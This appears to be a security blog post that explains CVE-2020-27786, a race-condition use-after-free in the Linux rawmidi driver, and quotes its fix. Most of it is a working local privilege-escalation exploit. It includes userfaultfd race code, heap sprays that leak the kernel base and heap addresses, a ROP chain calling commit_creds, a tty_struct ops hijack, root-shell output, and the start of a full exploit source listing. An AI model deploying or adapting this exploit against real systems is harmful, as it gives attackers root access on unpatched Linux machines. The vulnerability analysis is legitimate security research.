ii4gsp

CVE-2020-27786 ( Race Condition + Use-After-Free )


Introduction

This blog post describes how to exploit a use-after-free vulnerability due to a race condition in MIDI devices in Linux Kernel 5.6.13.
This vulnerability is identified as CVE-2020-27786.


Vulnerability

The MIDI driver is exposed through /dev/snd/midiC0D*. For these device nodes to be available, the kernel must be built with the CONFIG_SND_RAWMIDI option enabled. The driver's file operations (fops) are defined as follows:

static const struct file_operations snd_rawmidi_f_ops =
{
	.owner =	THIS_MODULE,
	.read =		snd_rawmidi_read,
	.write =	snd_rawmidi_write,
	.open =		snd_rawmidi_open,
	.release =	snd_rawmidi_release,
	.llseek =	no_llseek,
	.poll =		snd_rawmidi_poll,
	.unlocked_ioctl =	snd_rawmidi_ioctl,
	.compat_ioctl =	snd_rawmidi_ioctl_compat,
};


snd_rawmidi_ioctl() handles ioctl commands. Passing SNDRV_RAWMIDI_IOCTL_PARAMS with params.stream set to SNDRV_RAWMIDI_STREAM_OUTPUT makes it call snd_rawmidi_output_params(). The relevant part of snd_rawmidi_ioctl() is shown below:

static long snd_rawmidi_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	struct snd_rawmidi_file *rfile;
	void __user *argp = (void __user *)arg;

	rfile = file->private_data;
	if (((cmd >> 8) & 0xff) != 'W')
		return -ENOTTY;
	switch (cmd) {
	case SNDRV_RAWMIDI_IOCTL_PVERSION:
		return put_user(SNDRV_RAWMIDI_VERSION, (int __user *)argp) ? -EFAULT : 0;
	case SNDRV_RAWMIDI_IOCTL_INFO:
	{
		int stream;
		struct snd_rawmidi_info __user *info = argp;

		if (get_user(stream, &info->stream))
			return -EFAULT;
		switch (stream) {
		case SNDRV_RAWMIDI_STREAM_INPUT:
			return snd_rawmidi_info_user(rfile->input, info);
		case SNDRV_RAWMIDI_STREAM_OUTPUT:
			return snd_rawmidi_info_user(rfile->output, info);
		default:
			return -EINVAL;
		}
	}
	case SNDRV_RAWMIDI_IOCTL_PARAMS:
	{
		struct snd_rawmidi_params params;

		if (copy_from_user(&params, argp, sizeof(struct snd_rawmidi_params)))
			return -EFAULT;
		switch (params.stream) {
		case SNDRV_RAWMIDI_STREAM_OUTPUT:
			if (rfile->output == NULL)
				return -EINVAL;
			return snd_rawmidi_output_params(rfile->output, &params);
		case SNDRV_RAWMIDI_STREAM_INPUT:
			if (rfile->input == NULL)
				return -EINVAL;
			return snd_rawmidi_input_params(rfile->input, &params);
		default:
			return -EINVAL;
		}
	}
        ...
}


In snd_rawmidi_output_params(), we call resize_runtime_buffer() to update the buffer.

/*
 * Apply user-supplied parameters to an output substream.
 *
 * Returns -EBUSY when substream->append is set and use_count is greater
 * than 1. Otherwise it calls snd_rawmidi_drain_output(), derives
 * active_sensing from params->no_active_sensing, and returns whatever
 * resize_runtime_buffer() returns for the substream's runtime.
 */
int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params *params)
{
	if (substream->append && substream->use_count > 1)
		return -EBUSY;
	snd_rawmidi_drain_output(substream);
	substream->active_sensing = !params->no_active_sensing;
	/* is_input == false: this is the output direction */
	return resize_runtime_buffer(substream->runtime, params, false);
}
EXPORT_SYMBOL(snd_rawmidi_output_params);


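At [A], kvzalloc() is called to allocate newbuf. The allocation size is params->buffer_size, which the user controls (any value from 32 bytes up to 1 MiB passes the checks), so the buffer can be made to land in a slab cache of the attacker's choosing. At [B], the current runtime->buffer is saved in oldbuf, and at [C], kvfree() is called to free oldbuf.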

/*
 * Validate the requested parameters and, if the size changed, replace
 * runtime->buffer with a freshly allocated one.
 *
 * Returns -EINVAL when buffer_size is outside [32, 1024 * 1024] or
 * avail_min is outside [1, buffer_size], -ENOMEM when the allocation
 * fails, and 0 otherwise.
 *
 * Note that nothing in this (pre-patch) version checks whether another
 * context is still using the old buffer before it is freed at [C].
 */
static int resize_runtime_buffer(struct snd_rawmidi_runtime *runtime,
				 struct snd_rawmidi_params *params,
				 bool is_input)
{
	char *newbuf, *oldbuf;

	if (params->buffer_size < 32 || params->buffer_size > 1024L * 1024L)
		return -EINVAL;
	if (params->avail_min < 1 || params->avail_min > params->buffer_size)
		return -EINVAL;
	if (params->buffer_size != runtime->buffer_size) {
		/* allocated before taking the spinlock; size is caller-controlled */
		newbuf = kvzalloc(params->buffer_size, GFP_KERNEL); // [A]
		if (!newbuf)
			return -ENOMEM;
		/* the pointer swap itself happens under runtime->lock */
		spin_lock_irq(&runtime->lock);
		oldbuf = runtime->buffer; // [B]
		runtime->buffer = newbuf;
		runtime->buffer_size = params->buffer_size;
		__reset_runtime_ptrs(runtime, is_input);
		spin_unlock_irq(&runtime->lock);
		/* old buffer is released after the lock has been dropped */
		kvfree(oldbuf); // [C]
	}
	runtime->avail_min = params->avail_min;
	return 0;
}


Calling write on a MIDI device calls snd_rawmidi_write(), which in turn calls snd_rawmidi_kernel_write1().

static ssize_t snd_rawmidi_write(struct file *file, const char __user *buf,
				 size_t count, loff_t *offset)
{
    ...
		count1 = snd_rawmidi_kernel_write1(substream, buf, NULL, count);
		if (count1 < 0)
			return result > 0 ? result : count1;
		result += count1;
		buf += count1;
		if ((size_t)count1 < count && (file->f_flags & O_NONBLOCK))
			break;
		count -= count1;
	...
}


In snd_rawmidi_kernel_write1(), spin_unlock_irqrestore() is called to temporarily release the runtime lock before copy_from_user() copies data from user space into runtime->buffer. Because the lock is not held during the copy, another thread can call resize_runtime_buffer() in the meantime and free the buffer that copy_from_user() is still writing to, which results in a use-after-free write.

static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
				      const unsigned char __user *userbuf,
				      const unsigned char *kernelbuf,
				      long count)
{
    ...
		if (kernelbuf)
			memcpy(runtime->buffer + appl_ptr,
			       kernelbuf + result, count1);
		else if (userbuf) {
			spin_unlock_irqrestore(&runtime->lock, flags);
			if (copy_from_user(runtime->buffer + appl_ptr,
					   userbuf + result, count1)) {
				spin_lock_irqsave(&runtime->lock, flags);
				result = result > 0 ? result : -EFAULT;
				goto __end;
			}
			spin_lock_irqsave(&runtime->lock, flags);
		}
		result += count1;
		count -= count1;
	}
    ...
}


Patch

The vulnerability was patched in commit c13f1463d84b86bedb664e509838bef37e6ea317 by adding the functions snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. When runtime->buffer is being referenced, call snd_rawmidi_buffer_ref to increment the buffer_ref, and call snd_rawmidi_buffer_unref to decrement the buffer_ref when it is not being used.

In the patched resize_runtime_buffer, the runtime->buffer_ref check returns an error if runtime->buffer is being referenced. Additionally, in snd_rawmidi_kernel_read1 and snd_rawmidi_kernel_write1, when reading or writing to runtime->buffer, snd_rawmidi_buffer_ref is called to increment runtime->buffer_ref. Once the operation is completed, snd_rawmidi_buffer_unref is called to decrement runtime->buffer_ref.

diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index a36b7227a15ad..334842daa9045 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -61,6 +61,7 @@ struct snd_rawmidi_runtime {
 	size_t avail_min;	/* min avail for wakeup */
 	size_t avail;		/* max used buffer for wakeup */
 	size_t xruns;		/* over/underruns counter */
+	int buffer_ref;		/* buffer reference count */
 	/* misc */
 	spinlock_t lock;
 	wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 20dd08e1f6756..2a688b711a9ac 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -120,6 +120,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
 		runtime->event(runtime->substream);
 }
 
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+{
+	runtime->buffer_ref++;
+}
+
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+{
+	runtime->buffer_ref--;
+}
+
 static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
 {
 	struct snd_rawmidi_runtime *runtime;
@@ -669,6 +680,11 @@ static int resize_runtime_buffer(struct snd_rawmidi_runtime *runtime,
 		if (!newbuf)
 			return -ENOMEM;
 		spin_lock_irq(&runtime->lock);
+		if (runtime->buffer_ref) {
+			spin_unlock_irq(&runtime->lock);
+			kvfree(newbuf);
+			return -EBUSY;
+		}
 		oldbuf = runtime->buffer;
 		runtime->buffer = newbuf;
 		runtime->buffer_size = params->buffer_size;
@@ -1019,8 +1035,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
 	long result = 0, count1;
 	struct snd_rawmidi_runtime *runtime = substream->runtime;
 	unsigned long appl_ptr;
+	int err = 0;
 
 	spin_lock_irqsave(&runtime->lock, flags);
+	snd_rawmidi_buffer_ref(runtime);
 	while (count > 0 && runtime->avail) {
 		count1 = runtime->buffer_size - runtime->appl_ptr;
 		if (count1 > count)
@@ -1039,16 +1057,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
 		if (userbuf) {
 			spin_unlock_irqrestore(&runtime->lock, flags);
 			if (copy_to_user(userbuf + result,
-					 runtime->buffer + appl_ptr, count1)) {
-				return result > 0 ? result : -EFAULT;
-			}
+					 runtime->buffer + appl_ptr, count1))
+				err = -EFAULT;
 			spin_lock_irqsave(&runtime->lock, flags);
+			if (err)
+				goto out;
 		}
 		result += count1;
 		count -= count1;
 	}
+ out:
+	snd_rawmidi_buffer_unref(runtime);
 	spin_unlock_irqrestore(&runtime->lock, flags);
-	return result;
+	return result > 0 ? result : err;
 }
 
 long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1342,6 +1363,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
 			return -EAGAIN;
 		}
 	}
+	snd_rawmidi_buffer_ref(runtime);
 	while (count > 0 && runtime->avail > 0) {
 		count1 = runtime->buffer_size - runtime->appl_ptr;
 		if (count1 > count)
@@ -1373,6 +1395,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
 	}
       __end:
 	count1 = runtime->avail < runtime->buffer_size;
+	snd_rawmidi_buffer_unref(runtime);
 	spin_unlock_irqrestore(&runtime->lock, flags);
 	if (count1)
 		snd_rawmidi_output_trigger(substream, 1);


Winning the Race

In this article, we’ll use the userfaultfd technique to win the race. userfaultfd is a system call that allows a thread in user space, rather than the kernel, to allocate new physical memory in the event of a page fault. By using userfaultfd when accessing a user page, you can block the kernel from executing until you complete the desired task. This article does not cover the detailed workings of the userfaultfd technique, and for a comprehensive understanding of how userfaultfd is utilized in exploit scenarios, please refer to this detailed blog post. https://blog.lizzie.io/using-userfaultfd.html

FUSE

Since Linux kernel 5.11, userfaultfd has been patched to prevent unprivileged users from using it in this way. On kernels 5.11 and later, FUSE can be used instead to suspend kernel threads. If you’re interested in learning more about the FUSE technique, I recommend reading the following. https://exploiter.dev/blog/2022/FUSE-exploit.html


Exploitation Overview

This is a short summary of the exploitation strategy:

  1. Spray the timerfd_ctx and msg_msg structures in kmalloc-256.

  2. Overwrite the m_ts field of the msg_msg structure with a large value.

  3. Request a message via msgrcv() with a larger size than the size used in msgsnd(), triggering an out-of-bounds read to leak timerfd_ctx.

  4. Spray a message containing the ROP chain and fake table in kmalloc-512.

  5. Overwrite the m_ts field of the msg_msg structure with a large value.

  6. Compute the address of the user-controlled heap (kmalloc-512) by leaking the m_list.next of the msg_msg structure by requesting a message via msgrcv() with a size larger than the size used in msgsnd().

  7. Spray the tty_struct structures in kmalloc-1024.

  8. Overwrite the tty_struct->ops pointer with the fake table address.

  9. When calling ioctl, pass the address containing the ROP chain as the third argument.


KASLR Bypass

The first step in the exploit is to bypass KASLR. To do so, we use struct msg_msg to create an arbitrary (out-of-bounds) read: we overwrite the m_ts field of struct msg_msg with a large value, so that msgrcv() copies out more data than the message actually holds. For more information on this structure, check out the wall-of-perdition and this post by Vitaly Nikolenko.

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};


The timerfd_ctx object is allocated in the kmalloc-256 cache when a timer instance is created by timerfd_create(). For more information on this structure, check out the hotrod post.

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	/* to show in fdinfo */
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};


struct hrtimer contains a function pointer, which we can leak to compute the kernel base address. When the timer is armed, timerfd_ctx->t.tmr.function is set to timerfd_tmrproc(), which is a kernel .text pointer.

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};


The following code snippet demonstrates how to use these structures to bypass KASLR by leaking the kernel base address:

    int qid[1];
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 9999;
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    char *addr = page;
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 240;
    srp.avail_min = 1;
    uint64_t err = ioctl(fd, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    struct args_trigger args;
    args.addr = addr + PAGE_SIZE - 0x18;
    args.fd= fd;

    /* Blocking before object created by size 256 in userfault */
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */
    srp.buffer_size = 250;
    err = ioctl(fd, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    /* send_msg 'A' */
    send_msg(qid[0], 0xf8, 'A');

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */
    for(int i = 256 / 2; i < 256; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    unsigned long timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));
    unsigned long kernel_base = timerfd_tmrproc - 0x2201f0;

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);


This output confirms that the timerfd_tmrproc address was successfully leaked, allowing the computation of the kernel_base address, thus bypassing KASLR.

/ $ ./leak
0x0 0000000000000001 4141414141414141
0x10 4141414141414141 4141414141414141
0x20 4141414141414141 4141414141414141
0x30 4141414141414141 4141414141414141
0x40 4141414141414141 4141414141414141
0x50 4141414141414141 4141414141414141
0x60 4141414141414141 4141414141414141
0x70 4141414141414141 4141414141414141
0x80 4141414141414141 4141414141414141
0x90 4141414141414141 4141414141414141
0xa0 4141414141414141 4141414141414141
0xb0 4141414141414141 4141414141414141
0xc0 4141414141414141 4141414141414141
0xd0 0000000000000000 0000000000000000
0xe0 0000000000000000 0000000000000000
0xf0 0000000000000000 0000000000000000
0x100 0000000000000000 0000000000000000
0x110 0000000000000000 0000000000000000
0x120 0000000000000000 0000000000000000
0x130 0000000000000000 0000000000000000
0x140 0000000000000000 0000000000000000
0x150 0000000000000000 0000000000000000
0x160 0000000000000000 0000000000000000
0x170 0000000000000000 0000000000000000
0x180 0000000000000000 0000000000000000
0x190 0000000000000000 0000000000000000
0x1a0 0000000000000000 0000000000000000
0x1b0 0000000000000000 0000000000000000
0x1c0 0000000000000000 0000000000000000
0x1d0 0000000000000000 ffff9008ff948301
0x1e0 0000000000000000 0000000000000000
0x1f0 0000091a45dcff71 0000091a45dcff71
0x200 ffffffffb12201f0 ffff90097bc1ee80
0x210 0000000001000001 0000000000000000
0x220 0000000000000000 0000000000000000
0x230 0000000000000000 0000000000000000
0x240 0000000000000000 0000000000000000
0x250 0000000000000000 17dd62bd7a22594d
0x260 0000000000000000 ffff9008ff948290
0x270 ffff9008ff948290 0000000000000000
...
...
0x1fe0 0000000000000000 0000000000000000
0x1ff0 0000000000000000 0000000000000000
[+] timerfd_tmrproc addr : 0xffffffffb12201f0
[+] kernel_base addr : 0xffffffffb1000000
/ $


RIP Control

The struct tty_struct was chosen for exploitation primarily because of its tty_struct->ops pointer, which is a pointer to a table of function pointers. When you open /dev/ptmx, the corresponding struct tty_struct is allocated in the kmalloc-1024 cache.

struct tty_struct {
	int magic;
	struct kref kref;
	struct device *dev;
	struct tty_driver *driver;
	const struct tty_operations *ops;
	int index;

	/* Protects ldisc changes: Lock tty not pty */
	struct ld_semaphore ldisc_sem;
	struct tty_ldisc *ldisc;
    ...
}


The struct tty_operations, which the ops pointer in tty_struct references, contains function pointers to various functions that handle operations on tty devices, such as ioctl, open, close, etc.

struct tty_operations
{
    struct tty_struct * (*lookup)(struct tty_driver *driver,
        struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
            const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
          unsigned int cmd, unsigned long arg);
    ...
};


When calling ioctl() on /dev/ptmx, you have the ability to control several register values, which is crucial for constructing and executing a ROP chain. Specifically, the second argument to ioctl lets you set the lower 4 bytes of RBX, RCX, and RSI to arbitrary values, and the third argument lets you control the full 8 bytes of RDX, R8, and R12.

int  (*ioctl)(struct tty_struct *tty,
          unsigned int cmd, unsigned long arg);


I discovered the following stack pivot gadget, which allows you to set the rsp register to a controlled location by passing the desired address as the third argument to ioctl:

0x8fc625: push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret


Heap Leak

When SMAP is enabled, the ROP chain must be placed in a user-controlled heap area of the kernel, as directly specifying a user address is not allowed.

As in the first step of the exploit, we use the struct msg_msg to create an arbitrary read. To create an arbitrary read, we overwrite the m_ts field of the struct msg_msg. We can leak msg_msg->m_list.next to find the heap address where the ROP chain and the fake function table are placed. image


The following code snippet demonstrates how to spray an ROP chain and a fake function table onto the kernel heap and subsequently leak the heap address.

    /* rop spray in kmalloc-512 */
    char secondary_buf[0x1ea - 0x30];
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)
    {
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);


The following code snippet demonstrates how to configure the ROP Chain and Fake Function Table in the buffer. The Fake Function Table is strategically placed at an address offset by 0x100 from the beginning of the ROP chain.

/*
 * Fill buf with the kernel ROP chain (starting at offset 0) and the fake
 * tty_operations table (starting at offset 0x100).
 *
 * Reads the globals kernel_base, pivot and the saved user-mode register
 * values (usr_cs, usr_rflags, usr_sp, usr_ss).
 */
void build_rop(char *buf)
{
    uint64_t *chain = (uint64_t *)buf;
    uint64_t *ops = (uint64_t *)(buf + 0x100);
    size_t n = 0;

    /* Stage 1: commit_creds(prepare_kernel_cred(0)) */
    chain[n++] = kernel_base + 0x15e8;   // pop rdi ; ret
    chain[n++] = 0x0;
    chain[n++] = kernel_base + 0x8a800;  // prepare_kernel_cred
    chain[n++] = kernel_base + 0x49fb8;  // pop rdx ; ret
    chain[n++] = 0x8;
    chain[n++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret
    chain[n++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret
    chain[n++] = kernel_base + 0x8a3c0;  // commit_creds

    /* Stage 2: KPTI trampoline back to user mode */
    chain[n++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22
    chain[n++] = 0x0;                    // rax
    chain[n++] = 0x0;                    // rdi

    /* Return frame: rip, cs, rflags, rsp, ss */
    chain[n++] = (unsigned long)&getRootShell;
    chain[n++] = (unsigned long)usr_cs;
    chain[n++] = (unsigned long)usr_rflags;
    chain[n++] = (unsigned long)usr_sp;
    chain[n++] = (unsigned long)usr_ss;

    /*
     * Fake function table: slots 4..6 point at a bare `ret`, every other
     * slot below 12 holds a recognisable marker value, and slot 12 holds
     * the stack pivot gadget.
     */
    for (size_t slot = 0; slot < 12; slot++)
    {
        if (slot >= 4 && slot <= 6)
        {
            ops[slot] = kernel_base + 0x1e; // ret
        }
        else
        {
            ops[slot] = 0xdeadbeefdeadbe00 + slot;
        }
    }

    ops[12] = pivot;
}


ROP

Now that we know the addresses of our ROP chain and fake function table, we use the use-after-free write to overwrite the tty_struct->ops pointer with the address of the fake function table. After that, when ioctl is triggered, a stack pivot occurs to redirect execution to the ROP chain, which is then executed to achieve the exploit’s goal.

image


The stack pivot gadget ends with pop rsp ; pop r13 ; ret, so the pop r13 consumes the first 8 bytes at the new stack location before ret executes. Therefore, you must pass the address of the ROP chain minus 8 bytes as the third argument, so that ret lands on the first gadget of the chain. The following code snippet achieves this:

for(int i = 0; i < 256; i++)
{
    ioctl(spray[i], 0, next - 8);
}


Running the exploit successfully yields a shell with root privileges.

/ $ id
uid=1000(user) gid=1000(user) groups=1000(user)
/ $ uname -a
Linux (none) 5.6.13 #1 SMP Tue Feb 27 00:45:10 PST 2024 x86_64 GNU/Linux
/ $ ./exploit
[+] STEP 1 : KASLR leak
[+] Opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x1336000 - 0x1337000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by size 256
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x1337000
[+] Deleting before object created by size 256 generating UAF
[+] Allocate msg_msg in kmalloc-256
[*] Waiting for userfaultd to finish ..
[+] Allocate timerfd_ctx in kmalloc-256
[+] Page fault lock released
[+] timerfd_tmrproc addr : 0xffffffffbcc201f0
[+] kernel_base addr : 0xffffffffbca00000
[+] pivot addr : 0xffffffffbd2fc625
[+] Close rawmidi

[+] STEP 2 : SMAP bypass
[+] Opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x3330000 - 0x3331000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by size 512
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x3331000
[+] Deleting before object created by size 512 generating UAF
[*] Waiting for userfaultd to finish ..
[+] Spray ROP Chain in kmalloc-512
[+] Page fault lock released
[+] msg_msg->m_list.next leak : 0xffff8c346fb40e00
[+] Fake tty_struct->ops function table: 0xffff8c346fb40f30
[+] Close rawmidi

[+] STEP 3 : Fake tty_struct->ops overwrite
[+] Re-opening rawmidi
[+] Mapping two pages
[+] Registering one page userfaultfd
[*] Start monitoring range: 0x5550000 - 0x5551000
[+] Userfaultfd registered
[+] Raising up the handler for userfaultfd
[+] Created one object by kmalloc-1024
[+] Triggering userfaultfd
[+] Page Fault triggered on address 0x5551000
[+] Deleting before object created by size 1024 generating UAF
[+] Allocate tty_struct in kmalloc-1024
[+] Page fault lock released
[+] uid : 0
[+] Got root.
/ # id
uid=0(root) gid=0(root)
/ # whoami
root
/ #


Full Exploit

// gcc -o exploit exploit.c -masm=intel -static -s -lpthread
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sound/asound.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <sys/timerfd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <pthread.h>
#include <poll.h>

/* Print msg together with the current errno text, then exit with failure. */
#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                        } while (0)
                        
/* Faulting addresses that handler_userfaultfd() reacts to. */
#define ADDRESS_PAGE_FAULT1 0x1337000
#define ADDRESS_PAGE_FAULT2 0x3331000
#define ADDRESS_PAGE_FAULT3 0x5551000
/* Page size used for the mappings and the userfaultfd ranges. */
#define PAGE_SIZE 0x1000
/* Device node of the raw MIDI driver that is opened by the exploit. */
#define DRIVER_RAWMIDI "/dev/snd/midiC0D0"

/* Stream selector value stored in snd_rawmidi_params.stream. */
#define SNDRV_RAWMIDI_STREAM_OUTPUT 0

/*
 * File descriptors are plain `int` so that the usual `fd < 0` / `fd == -1`
 * failure checks actually work; with an unsigned type a failed open()
 * could never be detected by `fd < 0`.
 */
int uffd;           /* userfaultfd descriptor, set by register_userfaultfd() */
int fd1, fd2, fd3;  /* rawmidi descriptors */
uint64_t next;      /* leaked heap address used as the ROP chain location */
uint64_t fake_table; /* address of the fake tty_operations table */

pthread_t thread[6];

/*
 * Flag polled in busy-wait loops by more than one thread. Declared _Atomic
 * so that concurrent plain reads and writes are well-defined and the spin
 * loops cannot be optimised into infinite loops.
 */
_Atomic bool release_page_fault = false;

static void *page;  /* base of the most recent two-page mapping */

unsigned long pivot;            /* address of the stack pivot gadget */
unsigned long kernel_base;      /* leaked kernel base address */
unsigned long timerfd_tmrproc;  /* leaked address of timerfd_tmrproc() */

/* User-mode register values captured by save_state(). */
unsigned long usr_cs, usr_ss, usr_rflags, usr_sp;

/* Arguments handed to the trigger_userfaultfd() thread. */
struct args_trigger
{
    char *addr;   /* user buffer passed to write() */
    int size;     /* number of bytes passed to write() */
    uint32_t fd;  /* descriptor that write() is issued on */
};

/*
 * Print a buffer as rows of "0x<offset> <word> <word>".
 *
 * buf:  buffer to dump, read as 64-bit words.
 * size: size of the buffer in bytes; trailing bytes that do not form a
 *       complete 64-bit word are ignored.
 *
 * When the number of words is odd, the last row contains a single word
 * instead of reading one word past the end of the buffer.
 */
void hexdump(uint64_t *buf, uint64_t size)
{
    uint64_t nwords = size / sizeof(uint64_t);

    for (uint64_t i = 0; i < nwords; i += 2)
    {
        printf("0x%lx ", (unsigned long)(i * sizeof(uint64_t)));
        printf("%016lx", (unsigned long)buf[i]);

        /* Only print the second column if that word is inside the buffer. */
        if (i + 1 < nwords)
        {
            printf(" %016lx", (unsigned long)buf[i + 1]);
        }

        printf("\n");
    }
}

/*
 * Capture the current user-mode cs, ss, rflags and rsp into the globals
 * usr_cs, usr_ss, usr_rflags and usr_sp. build_rop() later places these
 * values in the ROP chain after the address of getRootShell.
 *
 * The operand order is destination-first (Intel order); the build command
 * for this file passes -masm=intel.
 * NOTE(review): the mnemonics carry AT&T-style size suffixes and the last
 * line uses `%%rsp`; confirm this assembles as intended with the toolchain
 * in use before changing anything here.
 */
static void save_state()
{
    __asm__ __volatile__(
    /* usr_cs <- cs */
    "movq %0, cs;"
    /* usr_ss <- ss */
    "movq %1, ss;"
    /* usr_rflags <- rflags, via the stack */
    "pushfq;"
    "popq %2;"
    /* usr_sp <- rsp */
    "movq %3, %%rsp\n"
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags), "=r" (usr_sp) : : "memory" );
}

/*
 * User-mode landing function placed in the ROP chain by build_rop().
 *
 * Exits if the process is not running as uid 0; otherwise replaces the
 * process with /bin/sh. This function never returns: it is reached through
 * the ROP chain rather than a normal call, so there is no valid return
 * address to go back to, and a failed execl() therefore terminates the
 * process explicitly.
 */
static void getRootShell(void)
{
    if (getuid() != 0)
    {
        printf("[-] Failed to get a root");
        exit(0);
    }

    printf("[+] uid : %d\n", (int)getuid());
